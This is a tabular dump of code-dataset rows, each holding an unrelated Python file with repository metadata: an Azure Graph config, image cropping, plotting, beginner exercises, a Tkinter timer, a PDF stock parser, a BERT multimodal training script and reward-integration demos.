seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
40347657143 | # Fill these in from your Azure app (see https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app).
CLIENT_ID = 'YOUR_CLIENT_ID'
CLIENT_SECRET = 'YOUR_CLIENT_SECRET'
# App redirect URI and allowed scopes.
REDIRECT_URI = 'http://localhost:5000/login/authorized'
SCOPES = [
"User.Read",
"Chat.Read",
"Files.Read",
"offline_access"
]
# URLs and endpoints for authorization.
AUTHORITY_URL = 'https://login.microsoftonline.com/common'
AUTH_ENDPOINT = '/oauth2/v2.0/authorize'
TOKEN_ENDPOINT = '/oauth2/v2.0/token'
# Microsoft Graph API configuration.
RESOURCE = 'https://graph.microsoft.com/'
# NOTE: the 'beta' channel is required for the API calls we need to make.
API_VERSION = 'beta'
# Version metadata for JSON output.
EXPORT_VERSION = '0.1'
| KasumiL5x/PyTeamsExporter | app_config.py | app_config.py | py | 785 | python | en | code | 1 | github-code | 13 |
3402293306 | # import the necessary packages
from imutils import contours
from skimage import measure
import numpy as np
import argparse
import imutils
import cv2
from google.colab.patches import cv2_imshow
import PIL
import os
def cropONH(imageName):
left_bias = 128
output_dim = 512
def calc_gt_bounds(msk_path):
gt = PIL.Image.open(msk_path)
mw, mh = gt.size
gt = 255 - np.array(gt)
gt_T = gt.T
for i in range(gt.shape[0]):
if (127 in gt[i]) and (0 in gt[i]):
h1 = i
break
for i in range(gt.shape[0]):
if (127 in gt[-i]) and (0 in gt[-i]):
h2 = mh - i
break
for i in range(gt_T.shape[0]):
if (127 in gt_T[i]) and (0 in gt_T[i]):
w1 = i
break
for i in range(gt_T.shape[0]):
if (127 in gt_T[-i]) and (0 in gt_T[-i]):
w2 = mw - i
break
return h1, h2, w1, w2
data_set = {"n":"Training","g":"Training", "V":"Validation", "T":"Testing"}
folderName= data_set[imageName[0]]
folder_path = "drive/Shared drives/Capstone Summer 2020/Data/Original/" + folderName
img_path = folder_path + "/Images/" + imageName + ".jpg"
mask_path = folder_path + "/Masks/" + imageName + ".bmp"
y1, y2, x1, x2 = calc_gt_bounds(mask_path)
image = PIL.Image.open(img_path)
im_w, im_h = image.size
var = round(0.15 * im_w)
curr_threshold = starting_threshold = 250
while True:
# load the image, convert it to grayscale, and blur it
image = cv2.imread(img_path)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blur = cv2.bilateralFilter(gray,9,75,75)
median=cv2.medianBlur(gray,5)
# threshold the image to reveal light regions in the blurred image
thresh = cv2.threshold(median, curr_threshold, 255, cv2.THRESH_BINARY)[1]
# perform a series of erosions and dilations to remove any small blobs of noise from the thresholded image
thresh = cv2.erode(thresh, None, iterations=2)
thresh = cv2.dilate(thresh, None, iterations=4)
# perform a connected component analysis on the thresholded image, then initialize a mask to store only the "large" components
labels = measure.label(thresh, connectivity=2, background=0)
mask = np.zeros(thresh.shape, dtype="uint8")
largest_blob = 0
# loop over the unique components
for label in np.unique(labels):
# if this is the background label, ignore it
if label == 0:
continue
# otherwise, construct the label mask and count the number of pixels
labelMask = np.zeros(thresh.shape, dtype="uint8")
labelMask[labels == label] = 255
numPixels = cv2.countNonZero(labelMask)
# if the number of pixels in the component is sufficiently large, then add it to our mask of "large blobs"
if numPixels > largest_blob:
largest_blob = numPixels
mask = labelMask
# find the contours in the mask, then sort them from left to right
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
#If there is nothing found for the image
if cnts == []:
curr_threshold -= 10
continue
print("Decreased threshold by: {}".format(starting_threshold - curr_threshold))
cnts = contours.sort_contours(cnts)[0]
# loop over the contours
for (i, c) in enumerate(cnts):
(x, y, w, h) = cv2.boundingRect(c)
center = (round(x+(w/2)), round(y+(h/2)))
cv2.putText(image, "O", center, cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)
box_radius = output_dim//2
tl_pt = [center[0]-box_radius-left_bias, center[1]-box_radius-left_bias]
br_pt = [center[0]+box_radius, center[1]+box_radius]
#Check if TL point is out of bounds
if tl_pt[0] < 0:
neg = tl_pt[0] * -1
tl_pt[0] = 0
br_pt[0] += neg
if tl_pt[1] < 0:
neg = tl_pt[1] * -1
tl_pt[1] = 0
br_pt[1] += neg
#Check if BR point is out of bounds
if br_pt[0] > im_w:
pos = im_w-br_pt[0]
br_pt[0] = im_w
tl_pt[0] -= pos
if br_pt[1] > im_h:
pos = im_h-br_pt[1]
br_pt[1] = im_h
tl_pt[1] -= pos
cv2.rectangle(image,tuple(tl_pt) , tuple(br_pt), (255,0,0), 8)
break
# Checks if Ground Truth Bounds are within Mask Bounds
if not ((x1 >= tl_pt[0]) and (x2 <= br_pt[0]) and (y1 >= tl_pt[1]) and (y2 <= br_pt[1])):
print("-"*50)
print("GT Bounds aren't within Mask Bounds for the IMAGE: {}".format(imageName))
print("-"*50)
print("Wid: ", br_pt[0]-tl_pt[0], "\tHei:", br_pt[1]-tl_pt[1])
# Opens a new image without the rectangles and stuff
orig_image = cv2.imread(img_path)
gt = cv2.imread(mask_path, cv2.IMREAD_GRAYSCALE)
# Crops the 'image/ground truth' to the mask bounds and dsiplays the cropped 'image/ground truth'
cropped_image = orig_image[tl_pt[1]:br_pt[1],tl_pt[0]:br_pt[0]]
cropped_gt = gt[tl_pt[1]:br_pt[1],tl_pt[0]:br_pt[0]]
# print(np.asarray(cropped_gt).shape)
c_img_path = "drive/Shared drives/Capstone Summer 2020/Data/Testing/Images/" + imageName + ".jpg"
c_msk_path = "drive/Shared drives/Capstone Summer 2020/Data/Testing/Masks/" + imageName + ".bmp"
# SAVES THE CROPPED IMAGES AND MASKS
cv2.imwrite(c_img_path, cropped_image)
cv2.imwrite(c_msk_path, cropped_gt)
# cv2_imshow(cropped_gt)
break
| pascuale2/Glaucoma-Identification | Dataset/crop_ONH.py | crop_ONH.py | py | 5,108 | python | en | code | 2 | github-code | 13 |
71148567379 | # -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
from dateutil.parser import parse
conntrack = open('conntrack.txt', 'r') #archivo conntrack
date = open('date.txt', 'r')# archivo data
con = []
fechas = []
for linea in open('conntrack.txt', 'r'):
con.append(linea)
for fecha in date.readlines(): # formato Sat Oct 8 20:00:01 CLST 20167
date = parse(fecha) # cambio de formato 2016-10-08 20:00:01-03:00
fechas.append(date)
plt.title(u"Conntrack Status")# Titulo
plt.plot(fechas,con) # ejes (x,y)
plt.xlabel('From Oct 8 2016 to Jan 10 2017') # Colocamos la etiqueta en el eje x
plt.ylabel('Connections') # Colocamos la etiqueta en el eje y
plt.show()
| amcabezas/grafico-conntrack-python | grafico_conntrack.py | grafico_conntrack.py | py | 692 | python | es | code | 0 | github-code | 13 |
15798625578 | a = [1, 4.9,"dhruv", 1+5j, 2, 54.88, "patel", 9+6j, 2, 8.44]
#ans2
lst = [1, 2.5, "Consultadd", 1+2j, 2]
print(lst[::-1])
print(lst[::2])
print(lst[2:])
print(lst[:3])
#ans3
lst = [1, 2, 3, 4, 5, 6, 7, 8, 9]
lst1 = 0
lst2 = 1
for i in lst:
lst1 += i
for i in lst:
lst2 *= i
print("Sum of all numbers in the list:", lst1)
print("Multiplication of all numbers in the list:", lst2)
#ans4
lst = [1, 2, 3, 4, 5, 6, 7, 8, 9]
print("Largest element:", max(lst))
print("Smallest element:", min(lst))
#ans5
lst = [1, 2, 3, 4, 5, 6, 7, 8, 9]
lst1 = [i for i in lst if i % 2 != 0]
print("New list which contains the specified numbers after removing the even numbers:", lst1)
#ans6
lst = [i*i for i in range(1, 31)]
print("First 5 elements of the list:", lst[:4])
print("Last 5 elements of the list:", lst[-1:-5])
#ans7
lst1 = [1, 3, 5, 7, 9, 10]
lst2 = [2, 4, 6, 8]
print(lst1[:-2].extend(lst2))
#ans8
a={1:10,2:20}
b={3:30,4:40}
c={}
for k, v in [a, b]:
c[k] = v
print(c)
#ans9
n = 8
dictionary = {}
for i in range(1, n+1):
dictionary[i] = i**2
print(dictionary)
#ams10
values =input("enter numbers")
l = values.split(",")
t = tuple(l)
print (l)
print (t)
| pdhruv1805/consultadd | assignment3.py | assignment3.py | py | 1,178 | python | en | code | 0 | github-code | 13 |
27736259266 | import time
from tkinter import *
from tkinter import messagebox
# creating Tk window
root = Tk()
root.geometry("300x250")
root.title("Time Counter")
# Declaration of variables
hour = StringVar()
minute = StringVar()
second = StringVar()
# setting the default value as 0
hour.set(" 00")
minute.set(" 00")
second.set(" 00")
# Labels for hours, minutes, and seconds
hour_label = Label(root, text="Hours", font=("Arial", 12))
hour_label.place(x=87, y=55)
minute_label = Label(root, text="Minutes", font=("Arial", 12))
minute_label.place(x=141, y=55)
second_label = Label(root, text="Seconds", font=("Arial", 12))
second_label.place(x=200, y=55)
# Use of Entry class to take input from the user
hourEntry = Entry(root, width=3, font=("Arial", 18, ""), textvariable=hour)
hourEntry.place(x=83, y=20)
minuteEntry = Entry(root, width=3, font=("Arial", 18, ""), textvariable=minute)
minuteEntry.place(x=143, y=20)
secondEntry = Entry(root, width=3, font=("Arial", 18, ""), textvariable=second)
secondEntry.place(x=203, y=20)
def submit():
try:
temp = int(hour.get()) * 3600 + int(minute.get()) * 60 + int(second.get())
except ValueError:
messagebox.showerror("Input Error", "Please input valid numbers")
return
while temp >= 0:
mins, secs = divmod(temp, 60)
hours = 0
if mins > 60:
hours, mins = divmod(mins, 60)
hour.set(" {:02d}".format(hours))
minute.set(" {:02d}".format(mins))
second.set(" {:02d}".format(secs))
root.update()
time.sleep(1)
# when temp value = 0; then a messagebox pop's up
# with a message:"Time's up"
if temp == 0:
messagebox.showinfo("Time Countdown", "Time's up")
temp -= 1
# button widget
btn = Button(root, text='Start Countdown', bd='5', command=submit)
btn.place(x=90, y=120)
root.mainloop() | Swapnil-Singh-99/PythonScriptsHub | timer/main.py | main.py | py | 1,934 | python | en | code | 19 | github-code | 13 |
15447884553 | #/usr/bin/python
import csv
import sys
import argparse
import torch
from torch import nn
import torch.nn.functional as F
from tqdm import tqdm
import os
import torchvision.models as models
from torch.utils.data import DataLoader, Dataset
import torchvision.transforms as transforms
import json
from PIL import Image
import numpy
from collections import defaultdict
import h5py
import numpy as np
import pickle
import pandas as pd
#BERT
import transformers
from transformers import BertModel, BertTokenizer, AdamW, get_linear_schedule_with_warmup
import warnings
warnings.filterwarnings('ignore')
RANDOM_SEED = 42
np.random.seed(RANDOM_SEED)
torch.manual_seed(RANDOM_SEED)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def load_query_trans_dict(file, lang):
'''
Create the Query->Translation lookup dictionary from the file `gold_german_query_classes.csv`
(src: https://github.com/spandanagella/multisense/blob/master/eval_verb_accuracy.py)
'''
query_trans_dict = dict()
with open(file) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
query = row['query'].strip()
if lang == 'en':
query_trans_dict[query] = row['verb'].strip()
elif lang == 'de':
query_trans_dict[query] = row['verb_translation'].strip()
return query_trans_dict
class ImageQueryDataset(Dataset):
'''
Dataset class for image + query + nodes_hidden_state
'''
def __init__(self, in_file, ref_dict,verb_map, query_dict, tokenizer, max_len, node_feat=None, node_map=None):
super(ImageQueryDataset, self).__init__()
self.file = h5py.File(in_file, 'r')
self.ref_dict = pickle.load(open(ref_dict,"rb")) #one-to-one mapping for image (file_path, file_name, verb)
#map unique verb to integer labels
self.verb_map = pickle.load(open(verb_map,"rb")) #verb_map is an unique dictionary determined by training set ref_dict
self.labels = [self.verb_map[verb] for verb in self.ref_dict['verbs']]
#look-up table with query as key and source verb as value
self.query_trans_dict = load_query_trans_dict(query_dict, 'en')
self.tokenizer = tokenizer #BERT tokenizer
self.max_len = max_len #Default 128
#additional node hidden state
if node_feat is not None:
self.node_feat = torch.load(node_feat)
#mapping of retrieved top-1 nodes to graph_id
self.node_df = pd.read_pickle(node_map)
else:
self.node_feat = None
def __getitem__(self, index):
image_feat = self.file['global_features'][index] #ResNet152 embedding
name = self.ref_dict['names'][index] #image name
query = name.split("__")[0].replace("_", " ") #image query
source_verb = self.query_trans_dict[query] #image source verb
query_prepend = source_verb + ' ' + query #prepend source verb to the query
encoding = self.tokenizer.encode_plus(
query_prepend,
add_special_tokens=True,
max_length=self.max_len,
truncation=True,
return_token_type_ids=False,
pad_to_max_length=True,
return_attention_mask=True,
return_tensors='pt',
)
target = self.labels[index] #the target verb in German, mapped to integer
#additional node features
if self.node_feat is not None:
graph_id = self.node_df[self.node_df['query']==query]['graph_id'].to_numpy()[0]
node_feat = self.node_feat[graph_id]
return {
'image_feat': image_feat,
'input_ids': encoding['input_ids'].flatten(),
'attention_mask': encoding['attention_mask'].flatten(),
'targets': torch.tensor(target, dtype=torch.long),
'node_feat': node_feat
}
else:
return {
'image_feat': image_feat,
'input_ids': encoding['input_ids'].flatten(),
'attention_mask': encoding['attention_mask'].flatten(),
'targets': torch.tensor(target, dtype=torch.long)
}
def __len__(self):
return self.file['global_features'].shape[0]
class Multimodel(nn.Module):
'''
Model class for Multimodal Verb Sense Disambiguation
[Textual query => BERT text feature; Image features; Node hidden state] => predict translated verb
'''
def __init__(self, n_classes, n_hidden=None, node_flag=False, nonlinearity=False, drop_prob=0, projection=False, proj_dim=100):
super(Multimodel, self).__init__()
self.bert = BertModel.from_pretrained(PRE_TRAINED_MODEL_NAME)
self.drop = nn.Dropout(p=drop_prob)
self.n_hidden = n_hidden
self.nonlinear = nonlinearity
self.projection = projection
if node_flag:
node_dim = 100 #dim of hidden states
else:
node_dim = 0
## two-layer
if self.n_hidden is not None:
if self.projection: #first project both img & text features to 100 dim, then concat w/ node hidden state (100-dim)
self.proj_img = nn.Linear(2048, proj_dim)
self.proj_txt = nn.Linear(self.bert.config.hidden_size , proj_dim)
self.hidden = nn.Linear(2*proj_dim + node_dim, n_hidden)
else: #one giant projection layer on concatenated features
self.hidden = nn.Linear(self.bert.config.hidden_size + 2048 + node_dim, n_hidden)
self.out = nn.Linear(n_hidden, n_classes) #output layer
## one-layer
else:
self.out = nn.Linear(self.bert.config.hidden_size + 2048 + node_dim, n_classes)
def forward(self, input_ids, attention_mask, image_features, node_features):
outputs = self.bert(
input_ids=input_ids,
attention_mask=attention_mask)
sequence_output = outputs[0]
textual_features = sequence_output[:,1,:] #[batch_size, seq_length, hidden_dim], #index 1 correspond to the prepended English verb embedding
if node_features is not None:
if self.projection:
img_projected = self.proj_img(image_features)
txt_projected = self.proj_txt(textual_features)
features = torch.cat([txt_projected, img_projected, node_features],dim=-1)
else:
features = torch.cat([textual_features, image_features, node_features],dim=-1)
else:
if self.projection:
img_projected = self.proj_img(image_features)
txt_projected = self.proj_txt(textual_features)
features = torch.cat([txt_projected, img_projected],dim=-1)
else:
features = torch.cat([textual_features, image_features],dim=-1)
if self.n_hidden is not None:
h = self.hidden(features)
h = self.drop(h)
if self.nonlinear:
h = F.relu(h)
else:
h = features
return self.out(h)
def train_epoch(model,data_loader,loss_fn,optimizer,device,n_examples,node_flag=False):
model = model.train()
losses = []
correct_predictions = 0
for d in data_loader:
image_feat = d["image_feat"].to(device)
input_ids = d["input_ids"].to(device)
attention_mask = d["attention_mask"].to(device)
targets = d["targets"].to(device)
if node_flag: #add node hidden state
node_feat = d["node_feat"].to(device)
outputs = model(
input_ids=input_ids,
attention_mask=attention_mask,
image_features=image_feat,
node_features=node_feat
)
else:
outputs = model(input_ids=input_ids,attention_mask=attention_mask,
image_features=image_feat, node_features=None)
_, preds = torch.max(outputs, dim=1)
loss = loss_fn(outputs, targets)
correct_predictions += torch.sum(preds == targets)
losses.append(loss.item())
loss.backward()
optimizer.step()
optimizer.zero_grad()
return correct_predictions.double() / n_examples, np.mean(losses)
def eval_model(model, data_loader, loss_fn, device, n_examples, node_flag=False):
model = model.eval()
losses = []
correct_predictions = 0
with torch.no_grad():
for d in data_loader:
image_feat = d["image_feat"].to(device)
input_ids = d["input_ids"].to(device)
attention_mask = d["attention_mask"].to(device)
targets = d["targets"].to(device)
if node_flag: #add node features
node_feat = d["node_feat"].to(device)
outputs = model(
input_ids=input_ids,
attention_mask=attention_mask,
image_features=image_feat,
node_features=node_feat
)
else:
outputs = model(input_ids=input_ids,attention_mask=attention_mask,
image_features=image_feat, node_features=None)
_, preds = torch.max(outputs, dim=1)
loss = loss_fn(outputs, targets)
correct_predictions += torch.sum(preds == targets)
losses.append(loss.item())
return correct_predictions.double() / n_examples, np.mean(losses)
if __name__=="__main__":
p = argparse.ArgumentParser()
p.add_argument('--batch_size', type=int, default=16)
p.add_argument('--epochs', type=int, default=10)
p.add_argument('--lr', type=float, default=0.0001)
p.add_argument('--decay', type=float, default=0)
p.add_argument('--node', action='store_true', default=False)
p.add_argument('--node_file', type=str, default="/content/drive/My Drive/graph/nyu_multimodal_kb/NER/graph_emb_node.t")
p.add_argument('--num_layer', type=int, default=2)
p.add_argument('--nonlinear', action='store_true', default=False)
p.add_argument('--dropout', type=float, default=0)
p.add_argument('--projection', action='store_true', default=False)
p.add_argument('--model_file', type=str, default="./multisense_model_weights/plustest/baseline_lr0.0005_2.bin")
p.add_argument('--subset', type=float, default=1) #determine whether subset training samples for low-resource regime
p.add_argument('--proj_dim', type=int, default=100) #specify the projection dimension (raw feature -> projected feature)
p.add_argument('--hidden_dim', type=int, default=128) #specify the projection dimension (concatenated projected features -> hidden layer)
args = p.parse_args()
##BERT params
PRE_TRAINED_MODEL_NAME = 'bert-large-cased'
tokenizer = BertTokenizer.from_pretrained(PRE_TRAINED_MODEL_NAME)
##create data loaders
if args.node:
train_dataset = ImageQueryDataset(in_file='features_per_image_train_german.h5',ref_dict='train_german.pkl',
verb_map = "verb_map.pkl", query_dict='gold_german_query_classes.csv',
tokenizer=tokenizer, max_len=128,
node_feat=args.node_file, node_map="query_nodes.pkl")
valid_dataset = ImageQueryDataset(in_file='features_per_image_val_german.h5',ref_dict='val_german.pkl',
verb_map = "verb_map.pkl", query_dict='gold_german_query_classes.csv',
tokenizer=tokenizer, max_len=128,
node_feat=args.node_file, node_map="query_nodes.pkl")
test_dataset = ImageQueryDataset(in_file='features_per_image_test_german.h5',ref_dict='test_german.pkl',
verb_map = "verb_map.pkl", query_dict='gold_german_query_classes.csv',
tokenizer=tokenizer, max_len=128,
node_feat=args.node_file, node_map="query_nodes.pkl")
else:
train_dataset = ImageQueryDataset(in_file='features_per_image_train_german.h5',ref_dict='train_german.pkl',
verb_map = "verb_map.pkl", query_dict='gold_german_query_classes.csv',
tokenizer=tokenizer, max_len=128)
valid_dataset = ImageQueryDataset(in_file='features_per_image_val_german.h5',ref_dict='val_german.pkl',
verb_map = "verb_map.pkl", query_dict='gold_german_query_classes.csv',
tokenizer=tokenizer, max_len=128)
test_dataset = ImageQueryDataset(in_file='features_per_image_test_german.h5',ref_dict='test_german.pkl',
verb_map = "verb_map.pkl", query_dict='gold_german_query_classes.csv',
tokenizer=tokenizer, max_len=128)
#create training data loaders
if args.subset == 1:
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size,num_workers = 1, shuffle=True)
else: #subset training set for low-resource scenario
subset_idx = list(range(0, len(train_dataset), int(1/args.subset)))
trainsub = torch.utils.data.Subset(train_dataset, subset_idx)
train_loader = torch.utils.data.DataLoader(trainsub, batch_size=args.batch_size,num_workers = 1, shuffle=True)
valid_loader = torch.utils.data.DataLoader(valid_dataset, batch_size=args.batch_size,num_workers = 1)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=args.batch_size,num_workers = 1)
##model
num_verbs = len(train_dataset.verb_map)
print(num_verbs)
if args.num_layer == 2:
model = Multimodel(num_verbs, args.hidden_dim, args.node, args.nonlinear, args.dropout, args.projection, args.proj_dim)
else:
model = Multimodel(num_verbs, None, args.node, False, 0)
for param in model.bert.parameters():
param.requires_grad = False #freeze BERT
#pytorch_total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
#print(pytorch_total_params)
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.decay)
loss_fn = nn.CrossEntropyLoss().to(device)
##training
history = defaultdict(list)
best_accuracy = 0
for epoch in range(args.epochs):
if epoch % 1 == 0:
print(f'Epoch {epoch + 1}/{args.epochs}')
print('-' * 10)
train_acc, train_loss = train_epoch(
model,
train_loader,
loss_fn,
optimizer,
device,
int(len(train_dataset)*args.subset),
args.node
)
print(f'Train loss {train_loss} accuracy {train_acc}')
val_acc, val_loss = eval_model(
model,
valid_loader,
loss_fn,
device,
len(valid_dataset),
args.node
)
print(f'Val loss {val_loss} accuracy {val_acc}')
print()
history['train_acc'].append(train_acc)
history['train_loss'].append(train_loss)
history['val_acc'].append(val_acc)
history['val_loss'].append(val_loss)
if val_acc > best_accuracy:
if args.node:
model_path = './multisense_model_weights/plustest/'+ args.node_file.split('/')[-1][:-2] +'.bin'
torch.save(model.state_dict(), model_path)
else:
model_path = './multisense_model_weights/plustest/baseline_lr' + str(args.lr) + '_' + str(args.num_layer) + '.bin'
torch.save(model.state_dict(), model_path)
best_accuracy = val_acc
#eval on test
model.load_state_dict(torch.load(model_path))
test_acc, test_loss = eval_model(
model,
test_loader,
loss_fn,
device,
len(test_dataset),
args.node
)
print(f"test acc: {test_acc}")
print(f"test loss: {test_loss}")
#save history
f_file=open("./multisense_model_weights/model_results.txt", "a+")
f_file.write(f"\n")
if args.node:
f_file.write("Setting: " + args.node_file.split('/')[-1][:-2])
else:
f_file.write(f"Setting: Baseline with lr {args.lr}" )
f_file.write(f"\n")
f_file.write(f"Result (Best Validation): {best_accuracy}")
f_file.write(f"\n")
f_file.write(f"Result (Best Test): {test_acc}")
f_file.close()
| iacercalixto/visualsem-kg | multisense/multi_train.py | multi_train.py | py | 16,396 | python | en | code | 2 | github-code | 13 |
18915488230 | given_list=[{'first':'1'},{'second':'2'},{'third':'1'},{'four':'5'},{'five':'5'},{'six':'9'},{'seven':'7'}]
i=0
req_list=[]
while i<len(given_list):
for item in given_list[i]:
value=given_list[i][item]
if value not in req_list:
req_list.append(value)
i+=1
print(req_list)
# how to improve this code?
# improved :)
# I did it... | gmswati/Dictionary_Meraki | Q7.py | Q7.py | py | 363 | python | en | code | 0 | github-code | 13 |
14386235805 | #
# @lc app=leetcode.cn id=144 lang=python3
#
# [144] 二叉树的前序遍历
#
from collections import deque
from typing import List
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def preorderTraversal(self, root: TreeNode) -> List[int]:
result = []
stack = [root]
cur = root
while stack:
cur = stack.pop()
if cur:
result.append(cur.val)
else:
continue
if cur.right:
stack.append(cur.right)
if cur.left:
stack.append(cur.left)
return result
# @lc code=end
tree = TreeNode(5, TreeNode(4, TreeNode(2), TreeNode(1)), TreeNode(6))
r = Solution().preorderTraversal(tree)
print(r)
| largomst/leetcode-problem-solution | 144.二叉树的前序遍历.2.py | 144.二叉树的前序遍历.2.py | py | 1,078 | python | en | code | 0 | github-code | 13 |
32986673794 | import PyPDF2
from openpyxl import Workbook
import os
workbook_stock = Workbook()
workbook_tax = Workbook()
# Select the active sheet
sheet_stock = workbook_stock.active
sheet_tax = workbook_tax.active
stock_feature=["Date","Order Number","Trade Number","Security/Contract Description","Buy/Sell","Qty"]
tax_feature=['Date','STT/CT','Brokerage','Transaction and Clearing Charges','Stamp Duty','Sebi Fee/RM','Taxable value of supply','Cgst@9%','Sgst@9%','Net Amount']
sheet_tax.append(tax_feature)
sheet_stock.append(stock_feature)
folder_path = r'C:\Users\Dharavat hanumanth\Desktop\saiteja_app\stocks'
for filename in os.listdir(folder_path):
if filename.endswith('.pdf'): # Check if the file is a PDF file
file_path = os.path.join(folder_path, filename) # Get the full file path
with open(file_path, 'rb') as pdf_file:
pdf_reader = PyPDF2.PdfReader(pdf_file)
page = pdf_reader.pages[0]
text = page.extract_text()
lines = text.split('\n')
taxes_all=lines[-18:-9]
date=lines[-9].split()[2]
stocks_all =lines[57:-21]
for i in stocks_all:
stock_temp=i.split()
stock=[date,stock_temp[0],stock_temp[2],stock_temp[4]+stock_temp[5]+stock_temp[6]+stock_temp[7],stock_temp[9],stock_temp[10]]
#print(stock)
#['1300000006444723', '78169183', 'StateBankofIndia', 'Buy', '21'] output stock
sheet_stock.append(stock)
tax_temp=[date]
for i in taxes_all:
tax_temp.append(i.split()[-1])
sheet_tax.append(tax_temp)
# Save the workbook of stock
workbook_stock.save('stock.xlsx')
workbook_tax.save('tax.xlsx') | PonnaSrikar/collecting-data-from-pdf-of-stocks-and-tax-then-creating-elx-using-python | creating_app_for_shinde.py | creating_app_for_shinde.py | py | 1,761 | python | en | code | 0 | github-code | 13 |
20886800929 | from models.calcular import Calcular
def main() -> None:
pontos: int = 0 # Iniciando o jogo com 0 pontos.
jogar(pontos)
def jogar(pontos: int) -> None: # Função principal
# Recebendo a dificuldade do jogo
dificuldade: int = int(input("Informe o nível de dificuldade desejado [1, 2, 3 ou 4]:"))
calc: Calcular = Calcular(dificuldade) # Instanciar um objeto informando a dificuldade como parametro
print("Informe o resultado para a seguinte operação: ")
calc.mostrar_operacao() # Mostrar a operação
resultado: int = int(input()) # Jogador informa o resultado
# Retornando os pontos para o jogador de acordo com suas respostas.
if calc.checar_resultado(resultado): # Checando se o resultado do jogador está correto ou não
pontos += 1 # Caso a resposta seja verdadeira, acrescentar um ponto
print(f"Você tem {pontos} pontos.")
# Verificando se o usuario deseja continuar jogando
continuar: int = int(input("Deseja continuar no jogo? [1 - Sim, 0- Não]"))
if continuar:
jogar(pontos)
else:
print(f"Você finalizou com {pontos} pontos.")
if __name__ == '__main__':
main() | ari-barbosa/Game-operacoesPy | game.py | game.py | py | 1,186 | python | pt | code | 1 | github-code | 13 |
31993684505 | # Criar pequenas listas para mostrar os elementos contidos nelas
lista_de_fruta = ['banana', 'maça', 'uva', 'abacate', 'laranja', 'limao', 'melao']
for frutas in lista_de_fruta:
print(frutas)
#Conte a quantidade de frutas na lista lista_de_frutas
contador = 0
for frutas in lista_de_fruta:
contador +=1
print(contador)
#Inserindo contagem em lista de números de 0 a 100
lista_numeros = range(0, 100)
for numero in lista_numeros:
print(numero)
#Inserindo contagem em lista de números de 0 a 100 com intervalo 2
lista_numeros = range(0, 100, 2)
for numero in lista_numeros:
print(numero)
#Inserindo contagem em lista de números de 0 a 100 com intervalo 5 onde o útimo número seja 100
lista_numeros = range(0, 105, 5)
for numero in lista_numeros:
print(numero)
#Crie uma estrutura em laco onde x seja exibido na tela equanto for menor que 10
i = 0
while i < 10:
print('i ainda é menor que 10:', i)
i = i + 1
| jemalicisou/Python-basico | estruturas_de_laco_python.py | estruturas_de_laco_python.py | py | 998 | python | pt | code | 0 | github-code | 13 |
24718332124 | import numpy as np
from scipy.stats import gamma
from matplotlib import pyplot as plt
import seaborn as sns
def m1(env_state):
return env_state["t"]
def m2(env_state):
time_since = list(reversed(env_state["rews"][:(env_state["t"]+1)])).index(env_state["rewsize"])
return time_since
def m3(env_state):
a = 3
b = 1
t = env_state["t"]
rew_int = a * sum(env_state["rews"][:(t+1)])/env_state["rewsize"] - b * t
return int(rew_int)
def m4(env_state):
# mean n0 is .25, mean of gamma is a0 / b0 (n/lambda)
a0 = 1
b0 = 4
tau = 8
t = env_state["t"]
z = np.sum(env_state["rews"][:(t+1)])/env_state["rewsize"]
return (a0 + z) / (b0 + tau * (1 - np.exp(-t/tau)))
def m5(env_state):
x = 3
a = 2
b = 1
t = env_state["t"]
return a * np.sum(env_state["rews"][:(t)])/env_state["rewsize"] + env_state["rews"][t] * x - b * t
# state = {"rews" : [1,0,0,0,1,0,0,1,0,1,0,1,0] , "t" : 0,"rewsize":1}
state = {"rews" : [1,0,1,0,1,0,0,1] , "t" : 0,"rewsize":1}
m1list = []
m2list = []
m3list = []
m4list = []
m5list = []
for i in range(len(state["rews"])):
m1list.append(m1(state))
m2list.append(m2(state))
m3list.append(m3(state))
m4list.append(m4(state))
m5list.append(m5(state))
state["t"] += 1
x = np.linspace(0,1,100)
dist = gamma.pdf(1,4,x)
plt.plot(x,dist)
plt.title("Gamma prior")
plt.xlabel('N0')
plt.ylabel('Probability Mass')
plt.show()
plt.figure()
# plt.plot(np.array(m1list) / sum(m1list))
# plt.title('Standardized Reward Integration for Sequence: [1,0,0,0,1,0,0,1,0,1,0,1,0]')
# plt.plot(np.array(m1list) / np.std(m1list),label = "Time")
# plt.plot(-np.array(m2list) / np.std(m2list),label = "Memoryless Integrator")
# plt.plot(np.array(m3list) / np.std(m3list),label = "Basic Integrator (a=3, b=1)")
# plt.plot(np.array(m4list) / np.std(m4list),label = "Bayesian Estimation of N0 (a0=1, b0=4)")
# plt.plot(np.array(m5list) / np.std(m5list),label = "Recency-Biased Integrator (a=1, b=2, x=3)")
plt.title('Reward Integrator Values for a trial with rewards at 0, 2, 4, and 7 seconds')
plt.plot(np.array(m1list),label = "Model 1: Time")
plt.plot(np.array(m2list),label = "Model 2: Time since last reward")
plt.plot(-np.array(m3list) + 3,label = "Model 3: Increase with time and dip with reward")
plt.xlabel('Time')
plt.ylabel('Reward Integrator Value')
plt.legend()
plt.show()
| sternj98/patchForagingQLearning | integrators_demo.py | integrators_demo.py | py | 2,382 | python | en | code | 2 | github-code | 13 |
30933676745 | import numpy as np
